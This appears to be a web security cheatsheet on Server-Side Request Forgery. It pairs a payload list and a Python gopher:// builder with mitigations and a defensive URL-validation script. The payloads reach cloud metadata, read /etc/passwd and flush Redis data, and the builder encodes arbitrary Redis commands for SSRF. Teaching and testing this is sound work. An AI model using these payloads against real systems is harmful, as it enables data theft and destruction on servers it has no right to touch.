
SSRF

Web cheatsheet — Web application enumeration and exploitation techniques.

Overview

Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to unintended locations. In a typical SSRF attack, the attacker exploits a server to access internal systems that are not directly accessible from the external network.

SSRF attacks frequently target cloud metadata endpoints (169.254.169.254), internal services, and localhost applications.

Category: Web

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting SSRF. The loopback, IPv6 and 0.0.0.0 forms are alternative spellings of "this host" that bypass naive string filters; gopher:// and dict:// let an HTTP-only SSRF primitive speak raw TCP protocols such as Redis (the gopher payload below is the RESP encoding of FLUSHALL):

http://127.0.0.1:8080/admin
http://localhost
http://[::1]:80
http://0.0.0.0:22
http://169.254.169.254/
file:///etc/passwd
gopher://localhost:6379/_*1%0d%0a$8%0d%0aFLUSHALL
dict://localhost:6379/info
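To show how the gopher payload above is built, here is an added example (not code from the original page, and not Gopherus itself) that encodes a list of Redis commands as RESP and wraps the bytes in a gopher:// URL. The gopher scheme sends everything after the leading "_" selector straight to the TCP socket, so a percent-encoded RESP stream becomes arbitrary Redis commands. Helper names are hypothetical; localhost:6379 is an assumed lab target. The example emits an explicit trailing CRLF after each command, which Redis ignores as an empty inline line, so the payload works whether or not the fetching client appends one.

```python
"""Build gopher:// payloads that carry Redis RESP commands over SSRF."""
from typing import Iterable, Sequence


def resp_encode(args: Sequence[str]) -> bytes:
    """Encode one Redis command as a RESP array of bulk strings.

    ["FLUSHALL"] -> b"*1\r\n$8\r\nFLUSHALL\r\n"
    The array header, each length prefix and each value are CRLF-terminated;
    a bulk string without its final CRLF leaves the server waiting for bytes.
    """
    out = b"*%d\r\n" % len(args)
    for arg in args:
        raw = arg.encode()
        out += b"$%d\r\n%s\r\n" % (len(raw), raw)
    return out


def gopher_quote(data: bytes) -> str:
    """Percent-encode only what a URL parser or gopher client would mangle.

    Keeps '*' and '$' readable (as the cheatsheet payloads do) and encodes
    CR, LF, space, '%', '?', '#' and any non-printable byte as lowercase %xx.
    """
    keep = set(range(0x21, 0x7F)) - {ord(c) for c in "%?#"}
    return "".join(chr(b) if b in keep else "%%%02x" % b for b in data)


def gopher_url(host: str, port: int, commands: Iterable[Sequence[str]]) -> str:
    """Assemble gopher://host:port/_<encoded RESP> for a sequence of commands.

    Several commands concatenated in one stream are executed in order by
    Redis, so one SSRF request can issue a whole command sequence.
    """
    payload = b"".join(resp_encode(cmd) for cmd in commands)
    return "gopher://%s:%d/_%s" % (host, port, gopher_quote(payload))


if __name__ == "__main__":
    # Single FLUSHALL: same bytes as the cheatsheet payload plus a final CRLF.
    print(gopher_url("localhost", 6379, [["FLUSHALL"]]))
    # Two read-only commands chained in one TCP stream (assumed lab target).
    print(gopher_url("localhost", 6379, [["CONFIG", "GET", "dir"], ["INFO", "server"]]))
```

Feed the printed URL to the vulnerable parameter; if the backend uses a libcurl-based fetcher the bytes reach Redis unchanged. Redis refuses commands when `protected-mode` is on and no password is set, so a reply of `-DENIED` rather than `+OK` is itself a useful fingerprint.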

Tools & Techniques

Recommended tools for SSRF:

  • Test parameters: url, uri, file, path, dest, redirect, src, source, href, data, target
  • SSRFmap: automated SSRF exploitation framework
  • Gopherus: generate gopher payloads for SSRF
  • Burp Collaborator: out-of-band SSRF detection

Prevention & Mitigation

Security recommendations to prevent SSRF:

  • Implement URL allowlists and block private IP ranges (loopback, RFC 1918, link-local including 169.254.169.254, and their IPv6 and IPv4-mapped forms); apply the check to the resolved IP address, not the hostname, and connect to that same address so DNS rebinding cannot change the target between check and use
  • Allow only the schemes the feature needs (normally http and https) and reject everything else, including file, gopher and dict
  • Use a network firewall or egress proxy to restrict outbound traffic from application hosts to an explicit set of destinations
  • Validate redirect targets with the same rules as the original URL, or disable automatic redirect following in the HTTP client
  • Run backend services on separate network segments, and require authentication on them rather than trusting the source address
  • Where the platform offers it, require session-token metadata access (for example AWS IMDSv2) so a plain GET to the metadata endpoint returns nothing useful
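One way to implement the allowlist and private-range checks above, as an added example rather than code from the original page: a scheme allowlist, literal addresses judged directly, hostnames resolved first, and every resolver answer tested against a blocked-network list before the caller is handed one IP to connect to. Function names are hypothetical; the resolver is injectable so the check can be exercised offline with constructed answers.

```python
"""Outbound URL check for SSRF prevention: allowlist schemes, resolve, then
block private and special destination addresses."""
import ipaddress
import socket
from typing import Callable, List
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Destinations an outbound fetcher should never reach: loopback, RFC 1918,
# CGNAT, link-local (cloud metadata lives at 169.254.169.254), multicast,
# reserved, and the IPv6 equivalents.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10",
)]

Resolver = Callable[[str], List[str]]


def system_resolver(host: str) -> List[str]:
    """Resolve with the OS resolver and return every A/AAAA answer."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_blocked_ip(ip: str) -> bool:
    """True if the address falls in any blocked range."""
    addr = ipaddress.ip_address(ip)
    # Unwrap IPv4-mapped IPv6 (::ffff:169.254.169.254) so it is judged as IPv4.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETWORKS)


def check_outbound_url(url: str, resolve: Resolver = system_resolver) -> str:
    """Return the IP the caller must connect to, or raise ValueError.

    Handing back the resolved IP (and connecting to it, with the Host header
    set from the URL) closes the rebinding window between check and use.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed: %r" % parts.scheme)
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    # Literal addresses are judged directly; names go through the resolver.
    # Odd literals such as 127.1 or 2130706433 are not accepted by ipaddress
    # and reach the resolver, which fails closed here if it returns nothing.
    try:
        answers = [str(ipaddress.ip_address(host))]
    except ValueError:
        answers = resolve(host)
    if not answers:
        raise ValueError("unresolvable host: %r" % host)
    # Reject if *any* answer is blocked: an attacker-controlled zone can mix
    # a public and a private record and hope the client picks the latter.
    for ip in answers:
        if is_blocked_ip(ip):
            raise ValueError("destination %s is a blocked address" % ip)
    return answers[0]


def is_safe_url(url: str, resolve: Resolver = system_resolver) -> bool:
    """Boolean wrapper for callers that only need allow/deny."""
    try:
        check_outbound_url(url, resolve)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed resolver answers for an offline demonstration.
    fake_dns = {"internal.corp": ["10.0.0.5"], "evil.test": ["93.184.216.34", "127.0.0.1"]}
    for u in ("http://[::1]:80/", "file:///etc/passwd", "http://169.254.169.254/",
              "http://internal.corp/", "http://evil.test/"):
        print(u, "->", "allowed" if is_safe_url(u, lambda h: fake_dns.get(h, [])) else "blocked")
```

The check alone is not enough if the HTTP client then follows a redirect to an internal address; either disable redirects or run the redirect target through check_outbound_url again before each hop.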
